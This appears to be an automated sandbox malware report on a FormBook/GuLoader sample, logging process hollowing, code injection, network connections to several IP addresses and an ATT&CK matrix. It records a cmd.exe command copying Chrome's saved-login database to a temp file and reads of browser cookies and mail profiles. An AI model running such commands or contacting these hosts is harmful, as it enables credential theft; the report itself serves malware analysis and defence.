        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h]10_2_1E8B3BA4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AEBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8AEBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E956BDE mov ebx, dword ptr fs:[00000030h]10_2_1E956BDE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E956BDE mov eax, dword ptr fs:[00000030h]10_2_1E956BDE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov ecx, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8DFBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov ecx, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBBC0 mov eax, dword ptr fs:[00000030h]10_2_1E8EBBC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92FBC2 mov eax, dword ptr fs:[00000030h]10_2_1E92FBC2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC0 mov eax, dword ptr fs:[00000030h]10_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h]10_2_1E8D8BD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8BD1 mov eax, dword ptr fs:[00000030h]10_2_1E8D8BD1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h]10_2_1E8C1BE7
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1BE7 mov eax, dword ptr fs:[00000030h]10_2_1E8C1BE7
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E5BE0 mov eax, dword ptr fs:[00000030h]10_2_1E8E5BE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E5BE0 mov eax, dword ptr fs:[00000030h]10_2_1E8E5BE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E984BE0 mov eax, dword ptr fs:[00000030h]10_2_1E984BE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h]10_2_1E8A7BF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7BF0 mov ecx, dword ptr fs:[00000030h]10_2_1E8A7BF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h]10_2_1E8A7BF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7BF0 mov eax, dword ptr fs:[00000030h]10_2_1E8A7BF0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F1B0F mov eax, dword ptr fs:[00000030h]10_2_1E8F1B0F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F1B0F mov eax, dword ptr fs:[00000030h]10_2_1E8F1B0F
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DB1B mov eax, dword ptr fs:[00000030h]10_2_1E93DB1B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DEB1C mov eax, dword ptr fs:[00000030h]10_2_1E8DEB1C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ACB1E mov eax, dword ptr fs:[00000030h]10_2_1E8ACB1E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8B10 mov eax, dword ptr fs:[00000030h]10_2_1E8B8B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8B10 mov eax, dword ptr fs:[00000030h]10_2_1E8B8B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B8B10 mov eax, dword ptr fs:[00000030h]10_2_1E8B8B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C0B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C0B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C0B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0B10 mov eax, dword ptr fs:[00000030h]10_2_1E8C0B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8ECB20 mov eax, dword ptr fs:[00000030h]10_2_1E8ECB20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93CB20 mov eax, dword ptr fs:[00000030h]10_2_1E93CB20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93CB20 mov eax, dword ptr fs:[00000030h]10_2_1E93CB20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93CB20 mov eax, dword ptr fs:[00000030h]10_2_1E93CB20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93DB2A mov eax, dword ptr fs:[00000030h]10_2_1E93DB2A
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EBB5B mov esi, dword ptr fs:[00000030h]10_2_1E8EBB5B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93FB45 mov eax, dword ptr fs:[00000030h]10_2_1E93FB45
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BB40 mov ecx, dword ptr fs:[00000030h]10_2_1E96BB40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96BB40 mov eax, dword ptr fs:[00000030h]10_2_1E96BB40
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E966B77 mov eax, dword ptr fs:[00000030h]10_2_1E966B77
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7B7D mov eax, dword ptr fs:[00000030h]10_2_1E8A7B7D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A7B7D mov ecx, dword ptr fs:[00000030h]10_2_1E8A7B7D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F2EB0 NtProtectVirtualMemory,LdrInitializeThunk,10_2_1E8F2EB0

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Benign windows process drops PE filesShow sources
        Source: C:\Windows\explorer.exeFile created: k4n8p7lb.exe.13.drJump to dropped file
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 35.244.144.199 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 88.99.22.5 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.120.157.187 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 50.62.172.157 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 34.237.47.210 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 66.29.140.185 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 185.61.153.97 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 216.172.172.87 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 81.2.194.128 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 164.155.212.139 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.64.119.254 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 38.143.25.232 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 136.143.191.204 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.201.232 80Jump to behavior
        Sample uses process hollowing techniqueShow sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2E0000Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: CC0000Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 7C0000Jump to behavior
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regionsShow sources
        Source: C:\Windows\SysWOW64\ipconfig.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF710730000Jump to behavior
        Injects a PE file into a foreign processesShow sources
        Source: C:\Windows\SysWOW64\ipconfig.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF710730000 value starts with: 4D5AJump to behavior
        Queues an APC in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Users\user\Desktop\BL_CI_PL.exeThread register set: target process: 4528Jump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeThread register set: target process: 4528Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 4528Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread register set: target process: 4528Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread register set: target process: 4528Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeThread register set: target process: 4528Jump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Users\user\Desktop\BL_CI_PL.exe "C:\Users\user\Desktop\BL_CI_PL.exe" Jump to behavior
        Source: C:\Users\user\Desktop\BL_CI_PL.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\BL_CI_PL.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeJump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" Jump to behavior
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeProcess created: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
        Source: explorer.exe, 0000000D.00000000.25915851679.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25869860942.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25966148111.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26080930624.0000000001B71000.00000002.00020000.sdmp, ipconfig.exe, 0000000E.00000002.30172953866.0000000006021000.00000002.00020000.sdmp, wscript.exe, 0000001D.00000002.30161576352.0000000003271000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000020.00000002.30158402523.0000000001011000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000021.00000002.30158214412.0000000000FD1000.00000002.00020000.sdmpBinary or memory string: Program Manager
        Source: explorer.exe, 0000000D.00000000.25875184030.0000000004FE0000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25915851679.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25889169393.000000000D848000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25934962558.000000000D848000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25869860942.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25966148111.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26080930624.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26103927702.000000000D848000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30172953866.0000000006021000.00000002.00020000.sdmp, wscript.exe, 0000001D.00000002.30161576352.0000000003271000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000020.00000002.30158402523.0000000001011000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000021.00000002.30158214412.0000000000FD1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 0000000D.00000000.25915851679.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25868093665.0000000001394000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.25914243705.0000000001394000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.25869860942.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26078982784.0000000001394000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.25966148111.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26080930624.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25964052976.0000000001394000.00000004.00000020.sdmp, ipconfig.exe, 0000000E.00000002.30172953866.0000000006021000.00000002.00020000.sdmp, wscript.exe, 0000001D.00000002.30161576352.0000000003271000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000020.00000002.30158402523.0000000001011000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000021.00000002.30158214412.0000000000FD1000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 0000000D.00000000.25915851679.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25869860942.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25966148111.0000000001B71000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26080930624.0000000001B71000.00000002.00020000.sdmp, ipconfig.exe, 0000000E.00000002.30172953866.0000000006021000.00000002.00020000.sdmp, wscript.exe, 0000001D.00000002.30161576352.0000000003271000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000020.00000002.30158402523.0000000001011000.00000002.00020000.sdmp, k4n8p7lb.exe, 00000021.00000002.30158214412.0000000000FD1000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Generic DropperShow sources
        Source: Yara matchFile source: Process Memory Space: BL_CI_PL.exe PID: 432, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: ipconfig.exe PID: 4888, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: k4n8p7lb.exe PID: 3200, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: k4n8p7lb.exe PID: 5788, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: NETSTAT.EXE PID: 4520, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 380, type: MEMORYSTR
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORY
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Tries to steal Mail credentials (via file / registry access)Show sources
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection712Virtualization/Sandbox Evasion22OS Credential Dumping1Security Software Discovery321Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution1DLL Side-Loading1Registry Run Keys / Startup Folder1Process Injection712LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSystem Network Connections Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol15SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Network Configuration Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
